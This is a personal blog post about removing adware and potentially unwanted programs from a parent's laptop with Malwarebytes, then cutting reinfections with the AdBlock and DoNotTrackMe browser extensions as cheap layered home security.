My father used his new laptop for roughly two months before he had me look at it. At first glance the system looked fine; the Norton 360 was not complaining about anything and the system performance was also fine. But when I opened the browsers (IE & Chrome) it was hard to locate the address bar – because the browser windows were covered with numerous advertising toolbars. Also, both browsers had a different home page and default search engines had changed as well. At this point I knew that some clean up was needed.

I started with my go-to-software: Malwarebytes. I used it to perform a full sweep of the system and after 3hrs it came back with more than 200 findings. And when I looked at the scan logs I found something interesting. Beside a hand-full of malicious executables, everything else was categorized as PUPs -Potentially Unwanted Program: “is a piece of software that is also downloaded when a user downloads a specific program or application.”

Now I have a previous experience responding to malicious activity generated by PUPs. Usually, this was done through an IDS alert when one of these PUPs beacon out. But in this case, my father’s system did not generate any IDS alerts; maybe because it had only been on the network for less than 3hrs. Regardless, I decided to remove all of the findings and than confirmed their removal by doing a subsequent scan.

And this is where the fun part begins. What do you do when you have cleaned up an infected system? Well, it’s time to place few protective measures. Most tech support personals perform this step by simply selling and installing a different anti-virus software. But this measure fails immediately because they do not take the time to understand how the system got infected in the first place and how the user uses his/her system.

In my father’s case, the system got infected due to his careless behavior while surfing online; this usually happens when he is searching. He has hard time differentiating between legitimate links verses advertisements. And because of this, he tends to click on popups. Now, in a perfect world you would do some security knowledge transfer and hope for a change in the behavior. However, this is not that easy so we have to complement this with something else. This is what has worked in my case: ad blocker.

I installed the AdBlock browser extension for both IE and Chrome on my father’s computer. This was in complement to activating browsers built-in popup blocking functionality. The Adblock “blocks banners, pop-ups and video ads – even on Facebook and YouTube” – which is perfect for someone who surfaces the web most of the time.

However, in addition to ad-blocker, I also installed the DoNotTrackMe extension. The reason for this was because  even though Adblock does a great job in blocking popups and other online advertisements but there is only so much that it can do due to today’s smart-advertisements. It is no surprise that online advertisement these days is very targeted – your online browsing behavior is tracked and based on this behavior you are presented with advertisements. This makes it extremely difficult to differentiate between legitimate search results verses advertisements.

During the time that I monitored my fathers machine (~3 weeks) with both of these extensions enabled, i noticed a significant decrease in the number of malware and PUPs installed on the system. In fact, during this time I ran 4 malwarebyte scans and it came back with between 5-8 findings. Interesting enough, by the end of my monitoring the Adblock extension had blocked 6,370 ads and DoNotTrackMe blocked 4,269 trackers.

In conclusion, layered security has proven to be effective in our enterprises and now its time that we take this idea and implement it in our home systems. The free browser extension solution that I present here is by no means complete or elaborate however, in my test above it has proven to be effective in blocking drive-by downloads (at a basic level) at a $0 cost!

Tagged , ,